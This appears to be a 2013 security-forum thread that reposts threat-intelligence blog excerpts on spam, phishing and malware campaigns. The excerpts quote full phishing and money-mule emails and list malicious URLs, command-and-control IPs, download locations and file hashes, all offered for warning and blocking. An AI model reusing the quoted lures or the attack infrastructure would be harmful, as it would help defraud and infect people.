2072 replies to this topic

[AplusWebMaster]

FYI...

Fake Southwest Airlines Giveaway...
- http://www.gfi.com/b...high-once-more/
Jan 15, 2013 - "A fresh campaign fake Southwest Airlines free ticket scam has made its way onto Facebook again, this time as an event invite spammed within the network.
Southwest Airlines is giving two tickets to any destination within the United States! To grab yours, just visit [URL here]
Based on the bit.ly data of the URL, it is highly likely that this scam has been going around since the 14th of this month. Once users click the shortened URL, they are redirected to a page where, purportedly, they can claim their free two tickets to the US. The page claims that the offer is only available for a certain period, suggesting that interested parties must act now or else miss this opportunity... Users are advised to ignore this Facebook event invite if you receive them and notify the creator of the invite that their post must be deleted."
(Screenshots available at the gfi URL above.)
___

xree .ru and the persistent pharma SPAM
- http://blog.dynamoo....harma-spam.html
15 Jan 2013 - "No doubt sent out by the same crew who are pushing malware, this pharma spam seems to have hit new highs.
Date: Tue, 15 Jan 2013 05:35:04 -0500 (EST)
From: Account Mail Sender [invoice @erlas .hu]
Subject: Invoice confirmation
Hello. Thank you for your order.
We greatly appreciate your time and look forward to a mutually rewarding business relationship with our company well into the future.
At present, our records indicate that we have an order or several orders outstanding that we have not received confirmation from you. If you have any questions regarding your account, please contact us.
We will be happy to answer any questions that you may have.
Your Customer Login Page
Customer login: [redacted]
Thanking you in advance for your attention to this matter.
Sincerely, Justa Dayton

The link in the email goes through a legitimate hacked site to [donotclick]xree .ru/?contactus but then it redirects to a seemingly random fake pharma site. However, the redirect only works if you have the referrer set correctly.
The landing sites are on:
199.59.56.59 (Hostwinds, Australia)
209.236.67.220 (WestHost Inc, US)
I can't find any malware on these sites, but you may as well block them if you can as they seem to have a lot of domains on them..."
(Long list of domains available at the dynamoo URL above.)
__

Verizon Wireless SPAM / dmssmgf .ru
- http://blog.dynamoo....-dmssmgfru.html
15 Jan - "This fake Verizon Wireless spam leads to malware on dmssmgf .ru:
From: Friendster Games [mailto:friendstergames @friendster .com]
Sent: 14 January 2013 21:47
Subject: Verizon Wireless
IMPORTANT ACCOUNT NOTE FROM VERIZON WIRELESS.
Your acknowledgment message is issued.
Your account No. ending in 2308
Dear Client
For your accommodation, your confirmation letter can be found in the Account Documentation desk of My Verizon.
Please browse your informational message for more details relating to your new transaction.
Open Information Message
In addition, in My Verizon you will find links to information about your device & services that may be helpfull if you looking for answers.
Thank you for joining us. My Verizon is laso works 24 hours 7 days a week to assist you with:
• Viewing your utilization
• Upgrade your tariff
• Manage Account Members
• Pay for your bill
• And much, much more...
2013 Verizon Wireless
Verizon Wireless | One Verizon Way Mail Code: 113WVC | Basking Ridge, MI 87325
We respect your privacy. Please browse our policy for more information

The malicious payload is on [donotclick]dmssmgf .ru:8080/forum/links/column.php (report here) hosted on:
81.31.47.124 (Master Internet s.r.o / Petr Bydzovsky, Czech Republic)
91.224.135.20 (Proservis UAB, Luthunia)
212.112.207.15 (ip4 GmbH, Germany)
The following IPs and domains are all connected:
81.31.47.124
91.224.135.20
212.112.207.15
dekamerionka .ru
dmssmgf .ru
dmpsonthh .ru
dmeiweilik .ru
belnialamsik .ru
demoralization .ru
dumarianoko .ru
dimanakasono .ru
bananamamor .ru "

Edited by AplusWebMaster, 15 January 2013 - 03:43 PM.

[AplusWebMaster]

FYI...

Fake EFTPS, BBB and Fed Reserve SPAM
- http://www.gfi.com/b...l-reserve-spam/
Jan 16, 2013 - "... the AV Labs have captured and recorded* a number of notable email threats last week — generally spam related to malware...
- Fake BBB Complaints Spam...
- Fake EFTPS Spam...
- FedMail ACH Spam... leads to Cridex
Users are advised to mark the above email threats as spam if they’re found in their inbox and then/or simply delete them."
(Screenshots available at the gfi URL above.)
* http://gfisoftware.tumblr.com/
___

Fake American Express SPAM / dozakialko .ru
- http://blog.dynamoo....zakialkoru.html
16 Jan 2013 - "This fake AmEx spam leads to malware on dozakialko .ru:
Sent: 16 January 2013 02:22
Subject: American Express Alert: Your Transaction is Aborted
Your Wed, 16 Jan 2013 01:22:07 -0100 Incoming Transfer is Terminated
Valued, $5203
Your American Express Card account retired ZUE36213 with amount of 5070 USD.
Transaction Time:Wed, 16 Jan 2013 01:22:07 -0100
Payment Due Date:Wed, 16 Jan 2013 01:22:07 -0100
One small way to help the environment - get paperless statements
Review billing
statement
Issue a payment
Change notifications
options
You currently reading the LIMITED DATA version of the Statement-Ready Information.
Switch to the DETAILED DATA version.
Thank you for your Cardmembership.
Sincerely,
American Express Information center

The malicious payload is at [donotclick]dozakialko .ru:8080/forum/links/column.php (report here*) hosted on the following IPs:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithunia)
212.112.207.15 (ip4 GmbH, Germany)
Plain list of IPs and related domains for copy-and-pasting:
89.111.176.125
91.224.135.20
212.112.207.15
dekamerionka .ru
dmssmgf .ru
dmpsonthh .ru
dmeiweilik .ru
belnialamsik .ru
demoralization .ru
dumarianoko .ru
dimanakasono .ru
bananamamor .ru
dozakialko .ru ..."
* http://wepawet.isecl...9...147&type=js
___

Fake EFTPS emails lead to BlackHole Exploit Kit
- http://blog.webroot....le-exploit-kit/
Jan 16, 2013 - "Cybercriminals are currently mass mailing tens of thousands of emails, impersonating the EFTPS (Electronic Federal Tax Payment System), in an attempt to trick its users into clicking on exploits and malware serving malicious links found in the emails...
Sample screenshot of the spamvertised email:
> https://webrootblog....nt_declined.png
... Upon succcessful clienet-side exploitation, the campaign drops MD5: d35a52d639468c2c4c857e6629b3f6f0 * ... Worm:Win32/Cridex.E.
Once executed, the sample phones back to the following command and control servers:
109.230.229.250:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA
163.23.107.65:8080
174.142.68.239:8080
81.93.250.157:8080
180.235.150.72:8080
109.230.229.70:8080
95.142.167.193:8080
217.65.100.41:8080
188.120.226.30:8080
193.68.82.68:8080
203.217.147.52:8080
210.56.23.100:8080
221.143.48.6:8080
182.237.17.180:8080
59.90.221.6:8080
64.76.19.236:8080
69.64.89.82:8080
173.201.177.77:8080
78.28.120.32:8080
174.120.86.115:8080
74.207.237.170:8080
77.58.193.43:8080
94.20.30.91:8080
84.22.100.108:8080
87.229.26.138:8080
97.74.113.229:8080
We’ve already seen the same pseudo-random C&C characters used in... previously profiled malicious campaigns..."
(More detail at the webroot URL above.)
* https://www.virustot...71830/analysis/
File name: calc.exe
Detection ratio: 25/46
Analysis date: 2013-01-14
___

Fake ADP SPAM / teamrobotmusic .net
- http://blog.dynamoo....otmusicnet.html
16 Jan 2013 - "This fake ADP spam leads to malware on teamrobotmusic .net:
Date: Wed, 16 Jan 2013 18:36:25 +0200 [11:36:25 EST]
From: "notify @adp .com" [notify @adp .com]
Subject: ADP Speedy Information
ADP Speedy Communication
[redacted]
Reference ID: 14580
Dear ADP Client January, 16 2012
Your Money Transfer Statement(s) have been uploaded to the web site:
https ://www.flexdirect .adp.com/client/login.aspx
Please see the following details:
• Please note that your bank account will be charged-off within 1 business day for the value(s) specified on the Record(s).
•Please don't reply to this message. auomatic informational system unable to accept incoming email. Please Contact your ADP Benefits Expert.
This email was sent to acting users in your company that access ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 14580

The malicious payload is on [donotclick]teamrobotmusic .net/detects/bits_remember_confident.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). This IP has been used in a few attacks recently and should be blocked if you can..."

Edited by AplusWebMaster, 16 January 2013 - 11:06 AM.

[AplusWebMaster]

FYI...

Fake Vodafone emails serve malware
- http://blog.webroot....-serve-malware/
Jan 17, 2013 - "Over the past 24 hours, cybercriminals resumed spamvertising fake Vodafone MMS themed emails, in an attempt to trick the company’s customers into executing the malicious attachment found in these emails...
Sample screenshot of the spamvertised email:
> https://webrootblog....mms_malware.png
Detection rate for the malicious executable:
MD5: bafebf4cdf640520e6266eb05b55d7c5 * ... Trojan-Downloader.Win32.Andromeda.pfu.
Once executed, the sample creates the following Registry values:
\Software\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched -> “C:\Documents and Settings\All Users\svchost.exe“
It also copies itself to other locations, and injects code in other processess. We intercepted a similar campaign last year, indicating that, depending on the campaign in question, cybercriminals are not always interested in popping up on everyone’s radar with persistent and systematic spamvertising of campaigns using identical templates. Instead, some of their campaigns tend to have a rather short-lived life cycle. We believe this practice is entirely based on the click-through rates for malicious URLs and actual statistics on the number of people that executed the malicious samples..."
* https://www.virustot...sis/1358366804/
File name: MMS.jpg.exe
Detection ratio: 21/46
Analysis date: 2013-01-16
___

Fake KeyBank "secure message" virus
- http://blog.dynamoo....ved-secure.html
17 Jan 2013 - "This fake KeyBank spam has an attachment called securedoc.zip which contains a malicous executable file named securedoc.exe.
Date: Thu, 17 Jan 2013 11:16:54 -0500 [11:16:54 EST]
From: "Antoine_Pearce @KeyBank .com" [Antoine_Pearce @KeyBank .com]
Subject: You have received a secure message
You have received a secure message
Read your secure message by opening the attachment, SECUREDOC. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions about Key's e-mail encryption service, please contact technical support at 888.764.7941.
First time users - will need to register after opening the attachment.
Help - https ://mailsafe.keybank .com/websafe/help?topic=RegEnvelope
About IronPort Encryption - https ://mailsafe.keybank .com/websafe/about

VirusTotal results are not good*. The ThreatExpert report for the malware can be found here**. The malware attempts to call home to:
173.230.139.4 (Linode, US)
192.155.83.208 (Linode, US)
..and download additional components from
[donotclick]ib-blaschke .de/4kzWUR.exe
[donotclick]chris-zukunftswege .de/DynThR8.exe
[donotclick]blueyellowbook .com/Cct1Kk58.exe ..."
* https://www.virustot...sis/1358440323/
File name: securedoc.exe
Detection ratio: 5/46
Analysis date: 2013-01-17
** http://www.threatexp...90f1317f1b68610
___

Fake Wire Transfer SPAM / dfudont .ru
- http://blog.dynamoo....ation-spam.html
17 Jan 2013 - "This spam leads to malware on dfudont .ru:
Date: Fri, 18 Jan 2013 08:58:56 +0600 [21:58:56 EST]
From: SUMMERDnIKYkatTerry @aol .com
Subject: Fwd: Wire Transfer Confirmation (FED_59983S76643)
Dear Bank Account Operator,
WIRE TRANSFER: FED86180794682707910
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.

The malicious payload is at [donotclick]dfudont .ru:8080/forum/links/column.php hosted on:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithunia)
212.112.207.15 (ip4 GmbH, Germany)
These IPs have been used in several malware attacks recently - blocking them is a good idea. The following malicious domains are also present on these servers:
dekamerionka .ru
dmssmgf .ru
dmpsonthh .ru
dmeiweilik .ru
belnialamsik .ru
demoralization .ru
damagalko .ru
dozakialko .ru
dumarianoko .ru
dimanakasono .ru
bananamamor .ru
dfudont .ru
Update: there is also a fake Sendspace spam sending visitors to the same payload...
Date: Thu, 17 Jan 2013 03:03:55 +0430
From: Badoo [noreply @badoo .com]
Subject: You have been sent a file (Filename: [redacted]_N584581.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]_N390.pdf, (973.39 KB) waiting to be downloaded at sendspace.(It was sent by JOHNETTE ).
You can use the following link to retrieve your file:
Download
Thank you,
Sendspace, the best free file sharing service.

Edited by AplusWebMaster, 17 January 2013 - 04:34 PM.

[AplusWebMaster]

FYI...

Fake Java update is malware
- http://blog.trendmic...java-0-day-fix/
Jan 17, 2013 - "... We were alerted to reports of a malware that poses as Java Update 11 created by an unknown publisher. The said fake update in question is javaupdate11.jar (detected as JAVA_DLOADER.NTW), which contains javaupdate11.class that downloads and executes malicious files up1.exe and up2.exe (both detected as BKDR_ANDROM.NTW). Once executed, this backdoor connects to a remote server that enables a possible attacker to take control of the infected system. Users can get this fake update by visiting the malicious website, {BLOCKED}currencyreport .com/cybercrime-suspect-arrested/javaupdate11.jar.
> http://blog.trendmic...update_site.gif
Though the dropped malware does not exploit CVE-2012-3174 or any Java-related vulnerability, the bad guys behind this threat is clearly piggybacking on the Java zero-day incident and users’ fears. The use of fake software updates is an old social engineering tactic. This is not the first time that cybercriminals took advantage of software updates. Last year, we reported about a malware disguised as a Yahoo! Messenger, which we found in time for Yahoo!’s announcement of its update for Messenger..."

[AplusWebMaster]

FYI...

Fake "A.R.T. Logistics" job offer
- http://blog.dynamoo....-job-offer.html
18 Jan 2013 - "There may be various genuine companies in the world with a name similar to "A.R.T. Logistics Industrial & Trading Ltd", but this job offer does not come from a genuine company. Instead it is trying to recruit people for money laundering ("money mule") jobs and parcel reshipping scams (a way of laundering stolen goods). Note that the scammers aren't even consistent in the way they name the company.
From: ART LOGISTICS INDUSTRIAL AND TRADING LTD [info@sender .org]
Reply-To: artlogisticsltd @yahoo .com.ph
Date: 18 January 2013 07:49
Subject: A.R.T. LOGISTICS INDUSTRIAL & TRADING LIMITED
A.R.T LOGISTIC INDUSTRIAL & TRADING LIMITED
Export & Import Agent‚ Service Company.
46/F Tower 1, Metroplaza 223 Hing Fong Road,
Kwai Chung New Territories, Hong Kong.
A.R.T. Logistics mainly provides services to customers in Russia, Kazakhstan and Hong Kong. We provide: - Air freight - Sea freight (FCL & LCL to EU, Russia, Kazakhstan & Central Asia) - Rail freight - Road Freight (FTL & LTL to any place in Russia, Kazakhstan and Central Asia) Our company has worked in Russia, Kazakhstan & Central Asia since 2005 and has wide experience of transport such as airfreight, container and rail.
We are presently shifting our base to North America and we have collective customers in the United State & Canada but We find it difficult establishing payments modalities with this customers and we don't intend loosing our customers. We are searching for a front line representative as intermediary by establishing a medium of getting payments from this customers in Canada & America by making payments through you to us. Do contact us for more information at this e-mail: (artlogis @e-mail .ua).
Subject to your satisfaction with the front line representative offer, you will be made our foreign payment receiving officer in your region and you will deduct 10% of every transactions made through you for your services as our Financial Representative.
Sincerely,
Yasar Feng Xu
A.R.T LOGISTIC INDUSTRIAL & TRADING LIMITED
N.B Reply to: artlogisticsltd @yahoo .com.ph

In this case, the spam originates from 31.186.186.2 [mail.zsmirotice .cz]. Avoid!"
___

Shylock banking trojan travels by Skype
- http://h-online.com/-1786928
18 Jan 2013 - "The banking trojan Shylock has found itself a new distribution channel – Skype. The security firm CSIS* recently discovered a Shylock module called "msg.gsm" trying to use the VoIP software to infect other computers. If successful, the malware then sets up a typical backdoor. The module tries to send Shylock as a file, bypassing warnings from the Skype software by confirming them itself and cleaning any generated messages from the Skype history. Once the trojan has been transferred it connects to a command and control server which can ask it to install a VNC server allowing remote control of the computer, get cookies, inject HTTP code into web sites being browsed, spread Shylock over removable drives, or upload files to a server. The epicenter of infections is, according to CSIS, the UK... At the time of writing, the most recent VirusTotal test** shows 15 of the engines now detecting it..."
* https://www.csis.dk/en/csis/blog/3811/

** https://www.virustot...ec842/analysis/
File name: 8fbeb78b06985c3188562e2f1b82d57d
Detection ratio: 15/46
Analysis date: 2013-01-18
___

Fake LinkedIn SPAM / shininghill .net
- http://blog.dynamoo....inghillnet.html
18 Jan 2013 - "This fake LinkedIn spam leads to malware on shininghill .net:
Date: Fri, 18 Jan 2013 18:16:32 +0200
From: "LinkedIn" [announce@e .linkedin .com]
Subject: LinkedIn Information service message
LinkedIn
REMINDERS
Invite notifications:
? From MiaDiaz ( Your renter)
PENDING EVENTS
∙ There are a total of 2 messages awaiting your response. Enter your InBox right now.
Don't want to get email info letters? Change your message settings.
LinkedIn values your privacy. Not once has LinkedIn made your e-mail address available to any another LinkedIn member without your permission. © 2013, LinkedIn Corporation.

The malicious payload is at [donotclick]shininghill.net/detects/solved-surely-considerable.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). This IP address has been used in several recent attacks and should be blocked if you can.
The following domains appear to be active on this IP address, all should be considered to be malicious..."
(More detail at the dynamoo URL above.)
___

Fake ADP SPAM / dopaminko .ru
- http://blog.dynamoo....opaminkoru.html
18 Jan 2013 - "This fake ADP spam leads to malware on dopaminko .ru:
Date: Fri, 18 Jan 2013 09:08:38 -0500
From: "service @paypal .com" [service @paypal .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 544043911
Fri, 18 Jan 2013 09:08:38 -0500
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www.lexdirect.adp .com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 206179035
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.

The malicious payload is at [donotclick]dopaminko .ru:8080/forum/links/column.php hosted on the following familiar IP addresses:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithunia)
212.112.207.15 (ip4 GmbH, Germany)
These following malicious domains appear to be active on these servers..."
(More detail at the dynamoo URL above.)

Edited by AplusWebMaster, 18 January 2013 - 03:43 PM.

[AplusWebMaster]

FYI...

Phishers target UnionBank of the Philippines clients
- http://www.gfi.com/b...ppines-clients/
Jan 21, 2013 - "We have been alerted by an ongoing phishing campaign that targets clients and online banking users of the UnionBank of the Philippines. The phishing URL, which is being sent to users in the form of spam, is found hosted on a legitimate but compromised Russian domain. We have also found previous records of the said domain hosting a different phishing page a few days ago. The spam entices users to visit a certain URL to “reactivate” their account... This phishing page has closely mimicked the look or template of legitimate pages where users can enter their sensitive banking information... Once users have entered and submitted their information, a confirmation window pops up and then users are redirected to the legitimate UnionBank website... Most UnionBank users have their PayPal accounts tied to their banking accounts, so it is very important to steer clear from emails claiming to be from the bank that ask for banking details... better call them and inquire about the email you receive just to be sure. It also pays to consult this Anti-Fraud and Anti-Phishing Guidelines page* from UnionBank for guidance on how to identify phishing pages from the real ones."
* http://www.unionbank...o...&Itemid=472
(Screenshots available at the gfi URL above.)
___

Malware Masks as Latest Java Update
- http://www.gfi.com/b...st-java-update/
Jan 21, 2013 - "... security experts have discovered a new zero-day, critical flaw on Java not so long ago and is already integrated into popular exploit kits, such as Blackhole, Redkit, Cool and Nuclear Pack. The said flaw, once exploited, is said to allow remote code execution on a target system without authentication from the user. This, of course, gives malware files the upper hand if users visit sites/URLs where they are hosted. Immediately after the vulnerability is found, Oracle has released its patch. Despite this speedy response from the company, many security experts have already began advising users to just forget the patch and disable Java in their browsers. Perhaps some users have already made the move of disabling Java entirely, or perhaps some users have opted still to apply the patch. If you belong in the former group, latter group, let this be our reminder to you: Please make sure that you’re downloading the patch straight from the Oracle website* and nowhere else because it’s highly likely that what you may be installing onto your system is malware**..."
* http://java.com/en/download/index.jsp

** http://blog.trendmic...java-0-day-fix/
___

Kenyan Judiciary (judiciary .go.ke) hacked to serve malware
- http://blog.dynamoo....oke-hacked.html
21 Jan 2013 - "The Judiciary of the Republic of Kenya has a mission to deliver justice fairly, impartially and expeditiously, promote equal access to justice, and advance local jurispudence by upholding the rule of law. Unfortunately, it has also been hacked to serve up malware.
> https://lh3.ggpht.co...ciary-go-ke.png
The site has been compromised to serve up an exploit kit being promoted by spam email. There's a redirector at [donotclick]www.judiciary .go.ke /wlc.htm attempting to redirect visitors to [donotclick]dfudont .ru:8080/forum/links/column.php where there's a nasty exploit kit.
> https://lh3.ggpht.co...iary-go-ke2.png
Of course, most visitors to the judiciary .go.ke site won't see that particular exploit. But if someone can create an arbitrary HTML page on that server, then they pretty much have the run of the whole thing and they can do what they like. So the question might be.. what else has been compromised? Hmm."
___

LinkedIn spam / prepadav .com
- http://blog.dynamoo....repadavcom.html
21 Jan 2013 - "This fake LinkedIn spam leads to malware on prepadav .com:
From: LinkedIn [mailto :news@ linkedin .com]
Sent: 21 January 2013 16:21
Subject: LinkedIn Reminder from your co-worker
LinkedIn
REMINDERS
Invitation reminders:
From CooperWright ( Your employer)
PENDING LETTERS
• There are a total of 2 messages awaiting your action. Acces to your InBox now.
Don't wish to receive email notifications? Adjust your letters settings.
LinkedIn respect your privacy. In no circumstances has LinkedIn made your e-mail acceptable to any other LinkedIn user without your allowance. © 2013, LinkedIn Corporation.

The malicious payload is at [donotclick]prepadav .com/detects/region_applied-depending.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). This IP has been used in several malware attacks recently and it should be blocked if you can..."
___

Fake Intuit SPAM / danadala .ru
- http://blog.dynamoo....danadalaru.html
21 Jan 2013 - "This fake Intuit spam leads to malware on danadala .ru:
Date: Mon, 21 Jan 2013 04:45:31 -0300
From: RylieBouthillette @hotmail .com
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Mon, 21 Jan 2013 04:45:31 -0300.
Finances would be gone away from below account # ending in 8134 on Mon, 21 Jan 2013 04:45:31 -0300
amount to be seceded: 5670 USD
Paychecks would be procrastinated to your personnel accounts on: Mon, 21 Jan 2013 04:45:31 -0300
Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services

The malicious payload is at [donotclick]danadala .ru:8080/forum/links/column.php hosted on a familiar bunch of IPs that have been used in several recent attacks:
89.111.176.125 (Garant-Park-Telecom, Russia)
91.224.135.20 (Proservis UAB, Lithunia)
212.112.207.15 (ip4 GmbH, Germany)..."

Edited by AplusWebMaster, 21 January 2013 - 05:12 PM.

[AplusWebMaster]

FYI...

Blackhole exploit kit on avirasecureserver .com
- http://blog.dynamoo....oit-kit-on.html
22 Jan 2013 - "What is avirasecureserver .com? Well, it's not Avira that's for sure.. it is in fact a server for the Blackhole Exploit Kit*. This site is hosted on 82.145.57.3, an Iomart / Rapidswitch IP... There's also no company in the UK called QHoster Ltd. In fact, if we check the QHoster.com domain we can see that it is a Bulgarian firm... QHoster has an IP block of 82.145.57.0/25 suballocated to it. A quick poke around indicates not much of value in this range, you may want to consider blocking the /25 as a precaution."
(More detail at the dynamoo URL above.)
* http://urlquery.net/...t.php?id=788732

- https://www.google.c...c?site=AS:20860
"Of the 18705 site(s) we tested on this network over the past 90 days, 1489 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-22, and the last time suspicious content was found was on 2013-01-21... Over the past 90 days, we found 14 site(s) on this network... that appeared to function as intermediaries for the infection of 670 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 22 site(s)... that infected 1080 other site(s)..."
___

'Droid malware spreads through compromised legitimate Web sites
- http://blog.webroot....mate-web-sites/
22 Jan 2013 - "... our sensor networks picked up an interesting website infection affecting a popular Bulgarian website for branded watches, which ultimately redirects and downloads premium rate SMS Android malware on the visiting user devices. The affected Bulgarian website is only the tip of the iceberg, based on the diversified portfolio of malicious domains known to have been launched by the same party that launched the original campaign...
Sample screenshot of the executed Android malware:
> https://webrootblog....pplications.png
... Sample malicious URLs displayed to Android users:
hxxp ://adobeflashplayer-up .ru/?a=RANDOM_CHARACTERS – 93.170.107.184
hxxp ://googleplaynew .ru/?a=RANDOM_CHARACTERS – 93.170.107.184
hxp ://browsernew-update .ru/?a=RANDOM_CHARACTERS – 93.170.107.184
... Detection rate for the malicious .apk files:
flash_player_installer.apk – MD5: 29e8db2c055574e26fd0b47859e78c0e * ... Android.SmsSend.212.origin.
Android_installer-1.apk – MD5: e6be5815a05c309a81236d82fec631c8 * ... HEUR:Trojan-SMS.AndroidOS.Opfake.bo.
... Upon execution, the Android sample phones back to gaga01 .net/rq.php – 93.170.107.57 – Email: mypiupiu1 @gmail.com transmitting..."
(More detail at the webroot URL above.)
* https://www.virustot...sis/1358799096/
File name: flash_player_installer.apk
Detection ratio: 5/46
Analysis date: 2013-01-21
** https://www.virustot...sis/1358799258/
File name: Android_installer-1.apk
Detection ratio: 5/46
Analysis date: 2013-01-21

> https://www.google.c...c?site=AS:57062
"Of the 2027 site(s) we tested on this network over the past 90 days, 23 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-22, and the last time suspicious content was found was on 2013-01-22... Over the past 90 days, we found 75 site(s) on this network... that appeared to function as intermediaries for the infection of 104 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 496 site(s)... that infected 1485 other site(s)..."
___

Something evil on 109.123.66.30
- http://blog.dynamoo....1091236630.html
22 January 2013 - "109.123.66.30 (UK2.NET, UK) hosts several domains containing the Blackhole Exploit Kit (example here*). The domains in user are (mostly) legitimate hacked domains, but there are a couple of odd things here. Most of the malicious domains have a format like this: 700ff4ad03c655cb11919113011611137102708d4fb6daf0e74bea4aa5e8f9f.darkhands .com - in this case darkhands .com is a legitimate domain registered to an individual in Australia, but it has been hacked to create a who load of malicious subdomains, hosted on another server from www.darkhands .com. In fact, almost all the domains are registered to Australians, but the key thing is in that all of those cases the main domains are hosted by OrionVM in Australia, with the main domains hosted in the 49.156.18.0/24 block. So how can the main (legitimate) sites be hosted in 49.156.18.0/24, but the malicious subdomains are hosted on a completely different network in the UK. I suspect that there is a compromise of some sort at OrionVM which has allowed the DNS records to be change (it should be noted that these domains used several different registrars). Another oddity is that these hijacked domains only go from A to I alphabetically, which indicates that there might be some other malicious servers in this same group... Also hosted on 109.123.66.30 are some malicious .in domains that were previously on 87.229.26.138 (see here**)... It looks like there are some legitimate sites on the same server, but blocking 109.123.66.30 is probably a good idea."
(Long list of domains at the dynamoo URL above.)
* http://urlquery.net/...t.php?id=796905

** http://blog.dynamoo....8722926138.html
___

Fake Swiss tax SPAM / africanbeat .net
- http://blog.dynamoo....s-tax-spam.html
22 Jan 2013 - "This Nederlands language spam appears to be from some Swiss tax authority, but in fact it leads to the Blackhole Exploit kit on africanbeat .net:
From: report@ ag .ch via bernina .co .il
Date: 22 January 2013 13:48
Subject: Re: je NAT3799 belastingformulier
Mailed-by: bernina .co .il
[redacted]
Wij willen brengen aan uw bericht dat je hebt fouten gemaakt bij het invullen van de meest recente belastingformulier NAT3799 (ID: 023520).
vindt u aanbevelingen en tips van onze fiscalisten HIER
( Wacht 2 minuten op het verslag te laden)
Wij verzoeken u om corrigeer de fouten en verzenden de gecorrigeerd aangifte aan uw belastingadviseur zo snel mogelijk.
Kanton Aargau
Sonja Urech
Sachbearbeiterin Wehrpflichtersatzverwaltung
Departement Gesundheit und Soziales
Abteilung Militär und Bevölkerungsschutz
Rohrerstrasse 7, Postfach, 6253 Aarau
Tel.: +41 (0)62 332 31 62
Fax: +41 (0)62 332 33 18
Translated as:
We want to bring to your notice that you have made mistakes when completing the most recent tax form NAT3799 (ID: 023520).
You can find recommendations and tips from our tax specialists HERE
(Wait 2 minutes for the report to load)
We ask you to correct the error and send the corrected report to your tax advisor as soon as possible.

The link leads to an exploit kit at [donotclick]africanbeat .net/detects/urgent.php (report here*) hosted on the familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea)..."
(More at the dynamoo URL above.)
* http://urlquery.net/...t.php?id=801678

Edited by AplusWebMaster, 22 January 2013 - 11:42 AM.

[AplusWebMaster]

FYI...

Fake Intuit emails lead to Black Hole Exploit Kit
- http://blog.webroot....le-exploit-kit/
Jan 23, 2013 - "Cybercriminals are currently spamvertising tens of thousands of fake emails, impersonating Intuit, in an attempt to trick its customers and users into clicking on the malicious links found in the emails. Once users click on any of the links, they’re exposed to the client-side exploits served by the latest version of the Black Hole Exploit Kit, which ultimately drops malware on the affected hosts...
Sample screenshot of the spamvertised email:
> https://webrootblog....exploit_kit.png
... Malicious domain name reconnaissance:
dopaminko .ru – 212.112.207.15
Name server: ns1.dopaminko .ru – 62.76.185.169
Name server: ns2.dopaminko .ru – 41.168.5.140
Name server: ns3.dopaminko .ru – 42.121.116.38
Name server: ns4.dopaminko .ru – 110.164.58.250
Name server: ns5.dopaminko .ru – 210.71.250.131
More malicious domains are known to have responded to the same IP (212.112.207.15)...
Some of these domains also respond to the following IPs – 91.224.135.20; 46.175.224.21, with more malicious domains part of the campaign’s infrastructure..."
(More detail at the webroot URL above.)
___

Phishing Scam spreads via Facebook PM
- http://www.gfi.com/b...ia-facebook-pm/
Jan 23, 2013 - "We’ve seen a number of cases wherein phishers have used compromised Twitter accounts to send direct messages (DMs) to their followers. We’re now beginning to see this same tactic used in Facebook in the form of private messages (PMs), and this isn’t just some spam mail in your inbox claiming you have received a “private message”... Recipients can act on this message in two ways: they can click the link to confirm their account, or simply ignore the message and delete it from their message inbox. Users who do the latter are guaranteed to be safe from this sort of scam. Users who do the former, however, are led to a single site where they can enter all personal information asked from them... Unsolicited messages from phishers landing on your private message inbox are no longer limited to Twitter. Despite this old method being used in a different platform, our advice on how to avoid falling for such scams remain the same: Always check the URL to be sure you’re not going to visit a link that is completely unrelated to Facebook—”Think before you click”, remember?; be skeptical about messages claiming to have come from Facebook; lastly, never share the URL to anyone on Facebook or on your other social sites as this only increases the possibility of someone clicking the link and getting phished themselves."
(Screenshots available at the gfi URL above.)
___

Fake NACHA SPAM / canonicalgrumbles .biz
- http://blog.dynamoo....rumblesbiz.html
23 Jan 2013 - "... fake NACHA spam leads to malware on canonicalgrumbles .biz... The malicious payload is at [donotclick]canonicalgrumbles .biz/closest/984y3fh8u3hfu3jcihei.php (report here*) hosted on 93.190.46.138 (Ukranian Hosting / ukrainianhosting .com). I've seen other malware servers in 93.190.40.0/21 before, I would recommend blocking the whole lot."
(More detail at the dynamoo URL above.)
* http://urlquery.net/...t.php?id=814512
___

Bogus Job SPAM ...
- http://blog.dynamoo....imate-firm.html
23 Jan 2013 - "H Seal is a real, legitimate firm. This email is -not- from H Seal, but a criminal organisation wanting to recruit people for money laundering and other unlawful activities. Originating IP is 199.254.123.20 ..."
(More detail at the dynamoo URL above.)
___

